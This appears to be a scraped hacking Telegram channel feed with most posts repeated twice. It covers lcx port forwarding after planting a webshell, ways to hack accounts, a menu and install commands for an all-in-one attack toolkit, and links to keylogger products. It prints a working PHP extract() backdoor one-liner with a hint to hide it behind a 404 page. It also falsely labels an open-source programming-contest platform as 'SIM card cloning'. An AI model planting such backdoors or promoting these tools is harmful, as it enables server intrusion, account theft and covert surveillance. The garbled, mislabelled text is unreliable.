β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦lcx usage experience (piracy)
example Why do port forwarding?
If an external network server, we can access it directly by connecting to its port without port forwarding.
Generally we are divided into four situations:
1. Intranet of this machine: It can be directly connected to the external network of the machine, for example, when we browse the website, connect in time Port 80 of the external network server;
2. External network of this machine: external network of other machine ----------------------------same as the above example;
3. External network of this machine: Intranet of other machine -------------------------If we open port 3389 of its server after getting the webshell, but when We connected to its port 3389 but couldn't connect to it. At this time, experienced people should have checked the status of the server and got webshell-check ipconfig. Everyone understands this, so I won't explain it! This is the second highlight of what I want to talk about: At this time, our idea is to forward its 3389 port. At this time, we will use lcx.exe.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦lcx usage experience (piracy)
example Why do port forwarding?
If an external network server, we can access it directly by connecting to its port without port forwarding.
Generally we are divided into four situations:
1. Intranet of this machine: It can be directly connected to the external network of the machine, for example, when we browse the website, connect in time Port 80 of the external network server;
2. External network of this machine: external network of other machine ----------------------------same as the above example;
3. External network of this machine: Intranet of other machine -------------------------If we open port 3389 of its server after getting the webshell, but when We connected to its port 3389 but couldn't connect to it. At this time, experienced people should have checked the status of the server and got webshell-check ipconfig. Everyone understands this, so I won't explain it! This is the second highlight of what I want to talk about: At this time, our idea is to forward its 3389 port. At this time, we will use lcx.exe.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#FastTips effective popular ways for hack accounts :
1) Attacks at the software level
Injection of malware into the user's system or exploitation of vulnerabilities in existing software. This is still the most widespread and effective hacking method. The proliferation of antiviruses, built-in firewalls, forced inclusion of UAC, auto-updates, increasing the overall security of the OS somewhat improves the situation, but cannot 100% protect users from their own rash actions.
2) Attacks at the traffic level
There are two types of such attacks - in the form of a sniffer of unprotected traffic and in the form of attacks on protected traffic (man in the middle, MITM).
a- This method of hacking is more effective than the first one, but it is more difficult in technical implementation, therefore it has not become so widespread. First of all, due to the limited territoriality - the attack must be carried out directly on the incoming and outgoing connections, and for this you need to physically have access to them.
b-. The second method is that a secure connection occurs, but not between the user certificate and the server certificate, but between the attacker and the server (hence the name MITM - man-in-the-middle attack). After the implementation of the "necessary" certificate, the compromised traffic is available to the hacker in decrypted form, which allows him to extract and save credentials from it.
By the way, both of these methods are also used at the software level: when malware replaces a certificate or a software sniffer is running locally.
3) User-level attacks
Social engineering techniques, in other words, deliberately deceiving a user in order to obtain credentials. The victim is misled when communicating via Internet channels or the phone, after which she herself transfers everything necessary to the attacker. Despite the high labor costs, such an attack is very effective in obtaining a specific user account.
4) Attack at the server (service provider) level
An extremely rare type of attack. It is theoretically possible, but in practice it is extremely rare. Here it is worth debunking the popular myth about βthe social network was hackedβ: in such a situation, it was not the social network that was hacked, but the devices of a particular user. And, most likely, he himself helped the attacker in this, and the hacker used the trick from point 1 or a combination of tricks 1 and 3. Therefore, such a scenario as "hacked social networks", the user need not be afraid, but should be more attentive to their own actions.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#FastTips effective popular ways for hack accounts :
1) Attacks at the software level
Injection of malware into the user's system or exploitation of vulnerabilities in existing software. This is still the most widespread and effective hacking method. The proliferation of antiviruses, built-in firewalls, forced inclusion of UAC, auto-updates, increasing the overall security of the OS somewhat improves the situation, but cannot 100% protect users from their own rash actions.
2) Attacks at the traffic level
There are two types of such attacks - in the form of a sniffer of unprotected traffic and in the form of attacks on protected traffic (man in the middle, MITM).
a- This method of hacking is more effective than the first one, but it is more difficult in technical implementation, therefore it has not become so widespread. First of all, due to the limited territoriality - the attack must be carried out directly on the incoming and outgoing connections, and for this you need to physically have access to them.
b-. The second method is that a secure connection occurs, but not between the user certificate and the server certificate, but between the attacker and the server (hence the name MITM - man-in-the-middle attack). After the implementation of the "necessary" certificate, the compromised traffic is available to the hacker in decrypted form, which allows him to extract and save credentials from it.
By the way, both of these methods are also used at the software level: when malware replaces a certificate or a software sniffer is running locally.
3) User-level attacks
Social engineering techniques, in other words, deliberately deceiving a user in order to obtain credentials. The victim is misled when communicating via Internet channels or the phone, after which she herself transfers everything necessary to the attacker. Despite the high labor costs, such an attack is very effective in obtaining a specific user account.
4) Attack at the server (service provider) level
An extremely rare type of attack. It is theoretically possible, but in practice it is extremely rare. Here it is worth debunking the popular myth about βthe social network was hackedβ: in such a situation, it was not the social network that was hacked, but the devices of a particular user. And, most likely, he himself helped the attacker in this, and the hacker used the trick from point 1 or a combination of tricks 1 and 3. Therefore, such a scenario as "hacked social networks", the user need not be afraid, but should be more attentive to their own actions.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Hackingtool Menu π§°
Anonymously Hiding Tools
Information gathering tools
Wordlist Generator
Wireless attack tools
SQL Injection Tools
Phishing attack tools
Web Attack tools
Post exploitation tools
Forensic tools
Payload creation tools
Exploit framework
Reverse engineering tools
DDOS Attack Tools
Remote Administrator Tools (RAT)
XSS Attack Tools
Steganograhy tools
Other tools
SocialMedia Bruteforce
Android Hacking tools
IDN Homograph Attack
Email Verify tools
Hash cracking tools
Wifi Deauthenticate
SocialMedia Finder
Payload Injector
Web crawling
Mix tools
Anonymously Hiding Tools
Anonmously Surf
Multitor
Information gathering tools
Network Map (nmap)
Dracnmap
Port scanning
Host to IP
Xerosploit
RED HAWK (All In One Scanning)
ReconSpider(For All Scaning)
IsItDown (Check Website Down/Up)
Infoga - Email OSINT
ReconDog
Striker
SecretFinder (like API & etc)
Find Info Using Shodan
Port Scanner - rang3r
Breacher
Wordlist Generator
Cupp
WordlistCreator
Goblin WordGenerator
Password list (1.4 Billion Clear Text Password)
Wireless attack tools
WiFi-Pumpkin
pixiewps
Bluetooth Honeypot GUI Framework
Fluxion
Wifiphisher
Wifite
EvilTwin
Fastssh
Howmanypeople
SQL Injection Tools
Sqlmap tool
NoSqlMap
Damn Small SQLi Scanner
Explo
Blisqy - Exploit Time-based blind-SQL injection
Leviathan - Wide Range Mass Audit Toolkit
SQLScan
Phishing attack tools
Setoolkit
SocialFish
HiddenEye
Evilginx2
I-See_You(Get Location using phishing attack)
SayCheese (Grab target's Webcam Shots)
QR Code Jacking
ShellPhish
BlackPhish
Web Attack tools
Web2Attack
Skipfish
SubDomain Finder
CheckURL
Blazy(Also Find ClickJacking)
Sub-Domain TakeOver
Dirb
Post exploitation tools
Vegile - Ghost In The Shell
Chrome Keylogger
Forensic tools
Autopsy
Wireshark
Bulk extractor
Disk Clone and ISO Image Aquire
Toolsley
Payload creation tools
The FatRat
Brutal
Stitch
MSFvenom Payload Creator
Venom Shellcode Generator
Spycam
Mob-Droid
Enigma
Exploit framework
RouterSploit
WebSploit
Commix
Web2Attack
Reverse engineering tools
Androguard
Apk2Gold
JadX
DDOS Attack Tools
SlowLoris
Asyncrone | Multifunction SYN Flood DDoS Weapon
UFOnet
GoldenEye
Remote Administrator Tools (RAT)
Stitch
Pyshell
XSS Attack Tools
DalFox(Finder of XSS)
XSS Payload Generator
Extended XSS Searcher and Finder
XSS-Freak
XSpear
XSSCon
XanXSS
Advanced XSS Detection Suite
RVuln
Steganograhy tools
SteganoHide
StegnoCracker
Whitespace
Other tools
SocialMedia Bruteforce
Instagram Attack
AllinOne SocialMedia Attack
Facebook Attack
Application Checker
Android Hacking tools
Keydroid
MySMS
Lockphish (Grab target LOCK PIN)
DroidCam (Capture Image)
EvilApp (Hijack Session)
HatCloud(Bypass CloudFlare for IP)
IDN Homograph Attack
EvilURL
Email Verify tools
Knockmail
Hash cracking tools
Hash Buster
Wifi Deauthenticate
WifiJammer-NG
KawaiiDeauther
SocialMedia Finder
Find SocialMedia By Facial Recognation System
Find SocialMedia By UserName
Sherlock
SocialScan | Username or Email
Payload Injector
Debinject
Pixload
Web crawling
Gospider
Anonymously Hiding Tools
Information gathering tools
Wordlist Generator
Wireless attack tools
SQL Injection Tools
Phishing attack tools
Web Attack tools
Post exploitation tools
Forensic tools
Payload creation tools
Exploit framework
Reverse engineering tools
DDOS Attack Tools
Remote Administrator Tools (RAT)
XSS Attack Tools
Steganograhy tools
Other tools
SocialMedia Bruteforce
Android Hacking tools
IDN Homograph Attack
Email Verify tools
Hash cracking tools
Wifi Deauthenticate
SocialMedia Finder
Payload Injector
Web crawling
Mix tools
Anonymously Hiding Tools
Anonmously Surf
Multitor
Information gathering tools
Network Map (nmap)
Dracnmap
Port scanning
Host to IP
Xerosploit
RED HAWK (All In One Scanning)
ReconSpider(For All Scaning)
IsItDown (Check Website Down/Up)
Infoga - Email OSINT
ReconDog
Striker
SecretFinder (like API & etc)
Find Info Using Shodan
Port Scanner - rang3r
Breacher
Wordlist Generator
Cupp
WordlistCreator
Goblin WordGenerator
Password list (1.4 Billion Clear Text Password)
Wireless attack tools
WiFi-Pumpkin
pixiewps
Bluetooth Honeypot GUI Framework
Fluxion
Wifiphisher
Wifite
EvilTwin
Fastssh
Howmanypeople
SQL Injection Tools
Sqlmap tool
NoSqlMap
Damn Small SQLi Scanner
Explo
Blisqy - Exploit Time-based blind-SQL injection
Leviathan - Wide Range Mass Audit Toolkit
SQLScan
Phishing attack tools
Setoolkit
SocialFish
HiddenEye
Evilginx2
I-See_You(Get Location using phishing attack)
SayCheese (Grab target's Webcam Shots)
QR Code Jacking
ShellPhish
BlackPhish
Web Attack tools
Web2Attack
Skipfish
SubDomain Finder
CheckURL
Blazy(Also Find ClickJacking)
Sub-Domain TakeOver
Dirb
Post exploitation tools
Vegile - Ghost In The Shell
Chrome Keylogger
Forensic tools
Autopsy
Wireshark
Bulk extractor
Disk Clone and ISO Image Aquire
Toolsley
Payload creation tools
The FatRat
Brutal
Stitch
MSFvenom Payload Creator
Venom Shellcode Generator
Spycam
Mob-Droid
Enigma
Exploit framework
RouterSploit
WebSploit
Commix
Web2Attack
Reverse engineering tools
Androguard
Apk2Gold
JadX
DDOS Attack Tools
SlowLoris
Asyncrone | Multifunction SYN Flood DDoS Weapon
UFOnet
GoldenEye
Remote Administrator Tools (RAT)
Stitch
Pyshell
XSS Attack Tools
DalFox(Finder of XSS)
XSS Payload Generator
Extended XSS Searcher and Finder
XSS-Freak
XSpear
XSSCon
XanXSS
Advanced XSS Detection Suite
RVuln
Steganograhy tools
SteganoHide
StegnoCracker
Whitespace
Other tools
SocialMedia Bruteforce
Instagram Attack
AllinOne SocialMedia Attack
Facebook Attack
Application Checker
Android Hacking tools
Keydroid
MySMS
Lockphish (Grab target LOCK PIN)
DroidCam (Capture Image)
EvilApp (Hijack Session)
HatCloud(Bypass CloudFlare for IP)
IDN Homograph Attack
EvilURL
Email Verify tools
Knockmail
Hash cracking tools
Hash Buster
Wifi Deauthenticate
WifiJammer-NG
KawaiiDeauther
SocialMedia Finder
Find SocialMedia By Facial Recognation System
Find SocialMedia By UserName
Sherlock
SocialScan | Username or Email
Payload Injector
Debinject
Pixload
Web crawling
Gospider
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NEW UPDATE ALL IN ONE REAL HACKING
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Z4nzu/hackingtool.git
2) chmod -R 755 hackingtool
3) cd hackingtool
4) sudo pip3 install -r requirement.txt
5) bash install.sh
6) sudo hackingtool
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NEW UPDATE ALL IN ONE REAL HACKING
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Z4nzu/hackingtool.git
2) chmod -R 755 hackingtool
3) cd hackingtool
4) sudo pip3 install -r requirement.txt
5) bash install.sh
6) sudo hackingtool
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Z4nzu/hackingtool: ALL IN ONE Hacking Tool For Hackers
ALL IN ONE Hacking Tool For Hackers. Contribute to Z4nzu/hackingtool development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ODOR1-PHP extract backdoor usage methode :)
let's introduce a new PHP backdoor: extract function backdoor.
codecode show as below:
1) extract
(PHP 4, PHP 5)
extract β import variables from the array to the current symbol table
int extract (array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]])
This function is used to The variables are imported from the array into the current symbol table.
2) Specific application:
1: PHP extract function in a variety of usage presentation
2: PHP extract () function
3: Official Document
4: php-backdoors-hidden- with-clever-use-of-extract-function
next surgeon launched :)
3) Server code:
<?@extract($_REQUEST);@die($err($info));?>
4) Finally, add various codes, tags and 404...you know (β΅β½β²)Ο
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ODOR1-PHP extract backdoor usage methode :)
let's introduce a new PHP backdoor: extract function backdoor.
codecode show as below:
1) extract
(PHP 4, PHP 5)
extract β import variables from the array to the current symbol table
int extract (array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]])
This function is used to The variables are imported from the array into the current symbol table.
2) Specific application:
1: PHP extract function in a variety of usage presentation
2: PHP extract () function
3: Official Document
4: php-backdoors-hidden- with-clever-use-of-extract-function
next surgeon launched :)
3) Server code:
<?@extract($_REQUEST);@die($err($info));?>
4) Finally, add various codes, tags and 404...you know (β΅β½β²)Ο
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Analysis of the evolution of the transparent tribe hacker organization
Let's see the truth #Cyberattack #Analyse
Let's see the truth #Cyberattack #Analyse
Forwarded from UNDERCODE NEWS
Free photo site Freepik reports data leak involving 8.3 million users
#Leaks
#Leaks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST ANONYMOUS KEYLOGGERS(PAID/TRIALS/FREE)
https://mac.keylogger.org/
https://android.keylogger.org/
https://www.keyloggers.com/
https://netbull-keylogger.keyloggers.com/10/buy1click.html
http://staffcop-standard.keyloggers.com/review.html
http://spytector.keyloggers.com/review.html
https://all-in-one-keylogger.keyloggers.com/10/buy1click.html
https://refog-personal-monitor.keyloggers.com/11/buy1click.html
https://spyrix-personal-monitor-pro.keyloggers.com/12/buy1click.html
https://staffcop-standard.keyloggers.com/review.html
https://netbull-keylogger.keyloggers.com/review.html
https://refog-personal-monitor.keyloggers.com/review.html
https://total-logger.keyloggers.com/review.html
https://spytech-spyagent-standard-edition.keyloggers.com/review.html
@uNDERCODEtESTING
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST ANONYMOUS KEYLOGGERS(PAID/TRIALS/FREE)
https://mac.keylogger.org/
https://android.keylogger.org/
https://www.keyloggers.com/
https://netbull-keylogger.keyloggers.com/10/buy1click.html
http://staffcop-standard.keyloggers.com/review.html
http://spytector.keyloggers.com/review.html
https://all-in-one-keylogger.keyloggers.com/10/buy1click.html
https://refog-personal-monitor.keyloggers.com/11/buy1click.html
https://spyrix-personal-monitor-pro.keyloggers.com/12/buy1click.html
https://staffcop-standard.keyloggers.com/review.html
https://netbull-keylogger.keyloggers.com/review.html
https://refog-personal-monitor.keyloggers.com/review.html
https://total-logger.keyloggers.com/review.html
https://spytech-spyagent-standard-edition.keyloggers.com/review.html
@uNDERCODEtESTING
β β β Uππ»βΊπ«Δπ¬πβ β β β
Keylogger.Org
Best keystroke loggers for macOS. Mac OS X keyloggers comparison.
A detailed comparison table of the best keyloggers for macOS for 2018. Mac OS X keystroke loggers have been compared and reviewed by our team of experts, so now you can easily choose, download or purchase the best OS X monitoring software for employee surveillanceβ¦
101+ OSINT Resources for Investigators [2020].pdf
848.5 KB
101 OSINT RESOURCES
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A REAL FREE SIM CARD CLONING-OPEN SOURCE :)
R E Q U I R E M E N T S :
-gcc/g++ (with 32 bit support β for compiling submissions) with C++17 support (Debian package: g++-multilib)
-MariaDB (Debian package: mariadb-server)
-MariaDB client library (Debian packages: libmariadbclient-dev)
-libseccomp (Debian package: libseccomp-dev)
-GNU/Make (Debian package: make version >= 4.2.1)
-libzip (Debian package: libzip-dev)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Debian
sudo apt-get install g++-multilib mariadb-server libmariadbclient-dev libseccomp-dev libzip-dev make libssl-dev
2) Ubuntu is not officially supported, you may try it, it may (not) work. Modern versions of some of the above packages are needed to build sim sucessfully.
3) Arch Linux
> sudo pacman -S gcc mariadb mariadb-libs libseccomp libzip make && \
> sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql && \
> sudo systemctl enable mariadb && sudo systemctl start mariadb
π¦Instructions
In case you installed MariaDB server for the first time, you should run:
1οΈβ£sudo mysql_secure_installation
First of all clone the Sim repository and all its submodules
2οΈβ£git clone --recursive https://github.com/varqox/sim &&
3οΈβ£cd sim
4οΈβ£Build
5οΈβ£make -j $(nproc)
6οΈβ£Make sure that you have created MariaDB account and database for Sim, use command below to create user sim@localhost and database simdb (when asked for password, enter your mariadb root password, by default it is empty β if that does not work try running the below command with sudo):
> mysql -e "CREATE USER sim@localhost IDENTIFIED BY 'sim'; CREATE DATABASE simdb; GRANT ALL ON simdb.* TO 'sim'@'localhost';" -u root -p
7οΈβ£Install
8οΈβ£make install
9οΈβ£It will ask for MariaDB credentials. By default, step 4 created MariaDB username sim, password sim, database simdb and user host localhost.
πIf you want to install Sim in other location that build/ type
make install DESTDIR=where-you-want-Sim-to-install
Run sim-server and job-machine
make run
1οΈβ£1οΈβ£If you have not installed Sim in the default location use command:
make run DESTDIR=where-you-installed-Sim
1οΈβ£2οΈβ£You can combine building, installation and running commands into:
make all install run
1οΈβ£3οΈβ£Enter http://127.7.7.7:8080 via your web browser, by default a Sim root account was created there
username: sim
password: sim
1οΈβ£4οΈβ£Remember to change the password now (or later) if you want to make Sim website accessible to others. Do not make hacker's life easier!
Well done! You have just installed Sim. There is a sim-server configuration file where-you-installed-Sim/sim.conf (build/sim.conf by default) where server parameters like address, workers etc. are. Also, there are log files log/*.log that you would find useful if something didn't work.
1οΈβ£5οΈβ£If you want to run Sim at system startup then you can use crontab -- just add these lines to your crontab (using command crontab -e):
@reboot sh -c 'until test -e /var/run/mysqld/mysqld.sock; do sleep 0.4; done; BUILD="where-you-installed-Sim"; "$BUILD/sim-server"& "$BUILD/job-server"&'
where-you-installed-Sim = absolute path to Sim build directory e.g. /home/your_username/sim/build
ANY DOUBT ASK @Undercode_Testing
ENJOY β€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A REAL FREE SIM CARD CLONING-OPEN SOURCE :)
R E Q U I R E M E N T S :
-gcc/g++ (with 32 bit support β for compiling submissions) with C++17 support (Debian package: g++-multilib)
-MariaDB (Debian package: mariadb-server)
-MariaDB client library (Debian packages: libmariadbclient-dev)
-libseccomp (Debian package: libseccomp-dev)
-GNU/Make (Debian package: make version >= 4.2.1)
-libzip (Debian package: libzip-dev)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Debian
sudo apt-get install g++-multilib mariadb-server libmariadbclient-dev libseccomp-dev libzip-dev make libssl-dev
2) Ubuntu is not officially supported, you may try it, it may (not) work. Modern versions of some of the above packages are needed to build sim sucessfully.
3) Arch Linux
> sudo pacman -S gcc mariadb mariadb-libs libseccomp libzip make && \
> sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql && \
> sudo systemctl enable mariadb && sudo systemctl start mariadb
π¦Instructions
In case you installed MariaDB server for the first time, you should run:
1οΈβ£sudo mysql_secure_installation
First of all clone the Sim repository and all its submodules
2οΈβ£git clone --recursive https://github.com/varqox/sim &&
3οΈβ£cd sim
4οΈβ£Build
5οΈβ£make -j $(nproc)
6οΈβ£Make sure that you have created MariaDB account and database for Sim, use command below to create user sim@localhost and database simdb (when asked for password, enter your mariadb root password, by default it is empty β if that does not work try running the below command with sudo):
> mysql -e "CREATE USER sim@localhost IDENTIFIED BY 'sim'; CREATE DATABASE simdb; GRANT ALL ON simdb.* TO 'sim'@'localhost';" -u root -p
7οΈβ£Install
8οΈβ£make install
9οΈβ£It will ask for MariaDB credentials. By default, step 4 created MariaDB username sim, password sim, database simdb and user host localhost.
πIf you want to install Sim in other location that build/ type
make install DESTDIR=where-you-want-Sim-to-install
Run sim-server and job-machine
make run
1οΈβ£1οΈβ£If you have not installed Sim in the default location use command:
make run DESTDIR=where-you-installed-Sim
1οΈβ£2οΈβ£You can combine building, installation and running commands into:
make all install run
1οΈβ£3οΈβ£Enter http://127.7.7.7:8080 via your web browser, by default a Sim root account was created there
username: sim
password: sim
1οΈβ£4οΈβ£Remember to change the password now (or later) if you want to make Sim website accessible to others. Do not make hacker's life easier!
Well done! You have just installed Sim. There is a sim-server configuration file where-you-installed-Sim/sim.conf (build/sim.conf by default) where server parameters like address, workers etc. are. Also, there are log files log/*.log that you would find useful if something didn't work.
1οΈβ£5οΈβ£If you want to run Sim at system startup then you can use crontab -- just add these lines to your crontab (using command crontab -e):
@reboot sh -c 'until test -e /var/run/mysqld/mysqld.sock; do sleep 0.4; done; BUILD="where-you-installed-Sim"; "$BUILD/sim-server"& "$BUILD/job-server"&'
where-you-installed-Sim = absolute path to Sim build directory e.g. /home/your_username/sim/build
ANY DOUBT ASK @Undercode_Testing
ENJOY β€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - varqox/sim: Sim is an open source platform for carrying out algorithmic contests and programming classes.
Sim is an open source platform for carrying out algorithmic contests and programming classes. - varqox/sim
stored xxs in facebook.pdf
441.5 KB
The Open Graph protocol When you add a URL in a Facebook post, Facebook will use the Open Graph protocol (FB doc) to display rich content. Here is a summary about how Facebook uses OG to embed external content in a FB post:
1. The aacker posts a URL on a FB post
2. FB server fetches the URL (server side) and reads the OG meta tags to extract info about the content of the URL (for example the content is a video with a tle, a cover image, a video encoding type and a video ο¬le URL)
3. The vicm views the FB post with the cover image and a play buon
4. When the vicm clicks on the play buon, the video loads using the video info extracted from the OG meta tags. This is when the XSS will be execute
1. The aacker posts a URL on a FB post
2. FB server fetches the URL (server side) and reads the OG meta tags to extract info about the content of the URL (for example the content is a video with a tle, a cover image, a video encoding type and a video ο¬le URL)
3. The vicm views the FB post with the cover image and a play buon
4. When the vicm clicks on the play buon, the video loads using the video info extracted from the OG meta tags. This is when the XSS will be execute
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Disadvantages of Kali Linux
As we all know that Kali Linux operating system have lots of advantages but it have also some disadvantages too. By which users can be faced some unexpected problems. Some cons of Kali Linux are β
- It makes the system slower.
- The system can get easily corrupted.
-Some softwares may not be functioned well .
-KALI is not as easy to use because itβs penetration oriented.
-KALI is not exactly the most search (as in research), and training oriented Linux. You need to find and see Wiki sources
-forget about universities all anonymous hackers don.t use kali
-In the process of using KALI for NORMAL, you may Trash some of KALIβs specialized settings for itβs own security.
wiki resoucesxd
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Disadvantages of Kali Linux
As we all know that Kali Linux operating system have lots of advantages but it have also some disadvantages too. By which users can be faced some unexpected problems. Some cons of Kali Linux are β
- It makes the system slower.
- The system can get easily corrupted.
-Some softwares may not be functioned well .
-KALI is not as easy to use because itβs penetration oriented.
-KALI is not exactly the most search (as in research), and training oriented Linux. You need to find and see Wiki sources
-forget about universities all anonymous hackers don.t use kali
-In the process of using KALI for NORMAL, you may Trash some of KALIβs specialized settings for itβs own security.
wiki resoucesxd
β β β Uππ»βΊπ«Δπ¬πβ β β β
Break webcam-cctv like expert .pdf
2.4 MB
Now it could be that your CCTV, IP camera is simply exposed on the Internet and the attacker has found it on sites such as Shodan. You havenβt changed the default password and bam, they are in. Watching your every move.